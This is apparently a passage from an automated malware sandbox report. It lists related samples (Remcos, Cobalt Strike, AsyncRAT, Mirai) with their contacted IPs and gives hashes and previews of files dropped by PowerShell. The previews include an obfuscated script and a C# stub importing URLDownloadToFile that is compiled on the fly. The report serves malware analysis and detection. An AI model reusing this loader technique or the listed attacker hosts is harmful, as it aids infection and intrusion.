                                                                          seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                          • 192.227.228.36
                                                                          FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                          • 192.227.228.36
                                                                          Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 192.227.228.36
                                                                          Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 192.227.228.36
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          DFNVereinzurFoerderungeinesDeutschenForschungsnetzesethinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 193.30.119.205
                                                                          New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          fbot.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 141.14.194.207
                                                                          fbot.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 132.252.36.195
                                                                          la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                          • 129.217.110.41
                                                                          la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                          • 141.33.15.156
                                                                          la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                          • 141.65.107.191
                                                                          WOWUSOrder Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 192.169.69.26
                                                                          AWkpqJMxci.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                          • 192.169.69.26
                                                                          D2pQ4J4GGZ.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                          • 192.169.69.26
                                                                          decode_6ec70947443cc64628fe11013d0e752591680ef46c9a78ec1409313d6669bdf9.exeGet hashmaliciousXWormBrowse
                                                                          • 192.169.69.26
                                                                          ibTSSrn71X.exeGet hashmaliciousAsyncRATBrowse
                                                                          • 192.169.69.26
                                                                          Dxnrbs22FC.exeGet hashmaliciousAsyncRATBrowse
                                                                          • 192.169.69.26
                                                                          QUOTATION #46789RFQ_SUPLMS_NOV24_SALEH_CONSTRUCTIONS_LLC_PDF.exeGet hashmaliciousRemcos, DarkTortillaBrowse
                                                                          • 192.169.69.26
                                                                          http://updatechrome.duckdns.org/1234567890.functionsGet hashmaliciousUnknownBrowse
                                                                          • 192.169.69.25
                                                                          file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                          • 192.169.69.26
                                                                          SPA-0987-ORDER.exeGet hashmaliciousRemcosBrowse
                                                                          • 192.169.69.26
                                                                          AS-COLOCROSSINGUSthinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                          • 198.46.178.192
                                                                          Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 198.46.178.192
                                                                          Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 104.168.46.26
                                                                          PO_203-25.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • 192.3.176.134
                                                                          Shipping Document.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                          • 107.172.44.175
                                                                          solicitud de cotizaci#U00f3n..09.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                          • 104.168.7.19
                                                                          x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                          • 23.95.140.216
                                                                          sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                          • 104.170.219.167
                                                                          arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                          • 192.3.253.172
                                                                          kXPgmYpAPg.docGet hashmaliciousUnknownBrowse
                                                                          • 192.3.101.150
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          3b5074b1b5d032e5620f69f9f700ff0egeHxbPNEMi.vbsGet hashmaliciousUnknownBrowse
                                                                          • 193.30.119.205
                                                                          thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          Dysacousma41.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • 193.30.119.205
                                                                          Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 193.30.119.205
                                                                          PO_0001.vbsGet hashmaliciousGuLoaderBrowse
                                                                          • 193.30.119.205
                                                                          Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                          • 193.30.119.205
                                                                          Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                          • 193.30.119.205
                                                                          RemittanceAdvice35282-17.xll.dllGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 193.30.119.205
                                                                          Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                          • 193.30.119.205
                                                                          Transferencia.pdf.lnk.lnkGet hashmaliciousLokibotBrowse
                                                                          • 193.30.119.205
                                                                          No context
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (428), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):166662
                                                                          Entropy (8bit):3.910133536871477
                                                                          Encrypted:false
                                                                          SSDEEP:3072:1VUeFHOtbqwAQvoa4yLdbVUeFHOtbqwAQvoa4yLBVUeFHOtbqwAQvoa4yLM:nH6TA1SdpH6TA1SrH6TA1SM
                                                                          MD5:8BA4E1DCC487BD110B4BCD41E7EE2BA5
                                                                          SHA1:1881AFFF1EB946FDB3EE62133CA43D0BC136AC37
                                                                          SHA-256:4BCB2F9B3A929BD940484218EF0A8C03842480A15BD8A3C4521F5097BD89D581
                                                                          SHA-512:006B7DCFDB7EE27CA1E6AA536C2399321966FFC3B82BC0F86470614345B6E0A2A1ED1D7A143C500669FBA375F9706CFF8ED421502DF7F12F49C3260DC5A8BDE4
                                                                          Malicious:false
                                                                          Preview:..........L.W.u.x.i.o.b.i.P.G.x.U.r.j.Q. .=. .".G.a.k.i.G.l.i.Z.H.e.f.k.i.z.o.".....c.R.G.K.s.P.Z.i.Z.W.k.L.k.n.h. .=. .".e.A.L.L.e.L.R.W.N.f.B.n.W.P.L.".....f.A.z.e.t.L.e.U.G.N.N.R.A.m.k. .=. .".t.N.J.P.i.Q.a.c.S.h.e.j.N.p.d.".....L.f.i.U.W.j.K.C.f.C.c.k.q.x.b. .=. .".N.d.Z.k.K.z.L.d.P.Z.I.L.U.a.o.".....h.L.L.L.W.L.L.O.N.i.K.f.t.A.u. .=. .".d.i.o.L.N.i.l.R.K.L.v.x.i.R.n.".....B.k.k.G.c.k.k.c.H.R.d.a.h.p.r. .=. .".Z.P.N.b.p.d.Z.i.L.Z.m.P.W.L.L.".........N.G.P.W.v.K.L.L.P.z.k.u.L.h.Z. .=. .".C.I.K.W.a.W.W.L.f.G.h.Z.K.L.h.".....c.U.W.x.W.U.W.o.P.c.Z.L.t.C.h. .=. .".c.p.x.e.B.t.f.f.P.z.G.b.m.L.G.".....c.B.W.O.u.i.G.K.W.u.m.u.K.G.c. .=. .".m.h.L.W.G.W.l.o.c.L.W.k.W.O.h.".........d.l.G.K.b.i.c.B.c.b.h.m.k.K.u. .=. .".K.m.e.c.m.i.W.x.s.R.Q.H.k.L.L.".....p.e.N.N.Z.i.H.i.U.p.B.l.x.e.z. .=. .".q.b.q.x.h.i.P.n.K.K.L.W.G.i.b.".....R.b.B.e.W.p.j.B.H.i.K.c.x.P.z. .=. .".e.G.P.x.N.T.b.W.j.z.G.i.K.k.p.".....L.p.d.P.G.P.K.k.f.L.c.L.P.v.b. .=. .".e.n.z.A.W.P.L.U.o.p.u.G.i.a.c.".....G.m.z.c.f.G.I.e.K.Z.
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):5829
                                                                          Entropy (8bit):4.901113710259376
                                                                          Encrypted:false
                                                                          SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                          MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                          SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                          SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                          SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                          Malicious:false
                                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1940658735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlllul84w/l/lZ:NllUOl/
                                                                          MD5:115C6867FB5AA137E2AB070A015217FF
                                                                          SHA1:274FA5340B810ECAC889E8A7ECF3EFCBC38ABB5F
                                                                          SHA-256:441CC5F34F21F191CF4AABE142FD3F04FA06663E2C28EC4D6229A1CAAF69A195
                                                                          SHA-512:0599907296251F104F57B32FDF3BE8F043F60E8DFA4327ED728EB421F329AE8B6EA6BCC3C0829EA61FE072D92FA62C5C95DC237FE3CF94C59FA6D0A509B8EEC2
                                                                          Malicious:false
                                                                          Preview:@...e................................................@..........
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Nov 26 10:27:18 2024, 1st section name ".debug$S"
                                                                          Category:dropped
                                                                          Size (bytes):1328
                                                                          Entropy (8bit):3.992666843697609
                                                                          Encrypted:false
                                                                          SSDEEP:24:HL56e9E2+fgviXDfHuwKEbsmfII+ycuZhNuakS2PNnqSqd:WgKztKPmg1ulua3KqSK
                                                                          MD5:F4AAFCB66577027BACB9A939DC1BB340
                                                                          SHA1:ADACC5EA81C6DA42CC86CA8C6F2FF7FD366F9FDB
                                                                          SHA-256:893666AFE07DDEF097E95BD6B70412EA5B080CEFC33A2C86342792B70046DCE3
                                                                          SHA-512:F9209D309D4926290F52F271043B950DE6A1537749D12DE3EBCF144ADB04991C22B28DC965EA5FA5E254E5F8FB54F9FBE93A92FF8075A960EBF1ED43A54B81F0
                                                                          Malicious:false
                                                                          Preview:L.....Eg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\blaytqul\CSC6824B6AE21FF4F1D9A4E95662E7FF991.TMP................Z...DBH2<...&...........4.......C:\Users\user\AppData\Local\Temp\RESF818.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.l.a.y.t.q.u.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                          File Type:MSVC .res
                                                                          Category:dropped
                                                                          Size (bytes):652
                                                                          Entropy (8bit):3.0865837290526232
                                                                          Encrypted:false
                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygak7Ynqq2PN5Dlq5J:+RI+ycuZhNuakS2PNnqX
                                                                          MD5:DF5AB67F1F444248323CDA90A60C26E5
                                                                          SHA1:6093786FCDEADEAA3576BC85FE948962A375D288
                                                                          SHA-256:501182E29BC803DD394DCD81F417861FA78D1C3A100906CC2F5A079A2DD3FA5F
                                                                          SHA-512:2B7D89DF83B1632C36786DDDFDB35A97F859A738168241973F67864131A86930F59654B2A4474467A8E3CCFCAD2903182758D1D7DEC422F0BF7F480E9CE5B174
                                                                          Malicious:false
                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.l.a.y.t.q.u.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.l.a.y.t.q.u.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (369)
                                                                          Category:dropped
                                                                          Size (bytes):488
                                                                          Entropy (8bit):3.8770145407613317
                                                                          Encrypted:false
                                                                          SSDEEP:6:V/DsYLDS81zuW5Qivw82FmMGxQXReKJ8SRHy4H6R6mfQMCe+Zf/WIy:V/DTLDfu8KFrXfHuRLZdUfOIy
                                                                          MD5:DF59540F8EDD52A40245B77825076B5C
                                                                          SHA1:101A773A82EEF36B277291D6E450D4984136B176
                                                                          SHA-256:041ED2F3F184DD53C0B2BACBE7E55A05A747A3ED1AA2CAB0E8C93E9AB25A121F
                                                                          SHA-512:790E1139EAB1D895386730743EA05B591820178B76FEC615ACAB192AD8D2C5960703CEBC2C6F4EFC8158020506F35CB69AE6545C649E3D87B74845FBC2EC1990
                                                                          Malicious:false
                                                                          Preview:.using System;.using System.Runtime.InteropServices;..namespace CCsUiONIf.{. public class xZBnUE. {. [DllImport("urLMON.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr Z,string hpHhlNwA,string TRtGJPBte,uint hAUaTPQ,IntPtr cMaQxASYhlK);.. }..}.
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):369
                                                                          Entropy (8bit):5.197682518630787
                                                                          Encrypted:false
                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fhbjJUzxs7+AEszIwkn23fhbv:p37Lvkmb6KRfJJUWZEifx
                                                                          MD5:1C603CF15D015FCEEEFF5788EC4020A4
                                                                          SHA1:1FED64F124305C24B7258E61DDA0B53A6F046CA0
                                                                          SHA-256:8E9D972265DF64351C84AB15BEE2F633F7006D6D9E066C49634A1C0E3A821551
                                                                          SHA-512:4CCE73BABBE7831257A864396F81A2448F8CF7B6BECDD7DC9365F569C25D2F1F4A8719D9124D949E57AE2EEC2B4F0FD00817B621D152B8C71CFC8A45415D2742
                                                                          Malicious:true
                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.0.cs"
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3072
                                                                          Entropy (8bit):2.8553967542707532
                                                                          Encrypted:false
                                                                          SSDEEP:24:etGS1XspeYYLPl788dYckKPJcLWePtkZfwxoTyAFWI+ycuZhNuakS2PNnq:6FDYwPlIqxuWeuJw2+91ulua3Kq
                                                                          MD5:D60C6DB8963E7DED30D93439174D7B7A
                                                                          SHA1:7B33F1602954410A8CD5175A56CFB76C83DF444C
                                                                          SHA-256:7CB34E6646468B250A59AE44518C991CF13028BD78954A9E00E04F3279DC1395
                                                                          SHA-512:A3D151FBC1C4BF133670F0BE093BEC7BCDB7A0FA59EE09AE7C0316BD7BFF525F48CBB70D5C44E2C1401DB9AC02356396C6D0067AF04171C5D14DA320CE5C26F0
                                                                          Malicious:false
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Eg...........!.................#... ...@....... ....................................@.................................d#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......$...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................8.1...................................................... ?.....P ......Q.........W.....Y.....b.....l.....t...Q.....Q...!.Q.....Q.......!.....*.......?.......................................(..........<Module>.bl
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                          Category:modified
                                                                          Size (bytes):867
                                                                          Entropy (8bit):5.312210913600501
                                                                          Encrypted:false
                                                                          SSDEEP:24:KJBqd3ka6KRfJJ1EifUKax5DqBVKVrdFAMBJTH:Cika6CH1EuUK2DcVKdBJj
                                                                          MD5:181A536C4668F770C027CE914B3A8B3B
                                                                          SHA1:87FCFC6BEDB6AF61E0506C450BCD43CD05B7C45E
                                                                          SHA-256:FDBFF1297E28072E142D5F32A8ACFC723132D8C412D650250B21297F5A97F0CB
                                                                          SHA-512:FF81A3DF6DFADDF3A6C3A96315529A23BBECE0F9A1E1080B496D5BA9606283D896B373D67EB12029346C4E3C3AD5ED0CE9AB91A9AE6792BDE7325418A0C3B70A
                                                                          Malicious:false
                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (428), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):166662
                                                                          Entropy (8bit):3.910133536871477
                                                                          Encrypted:false
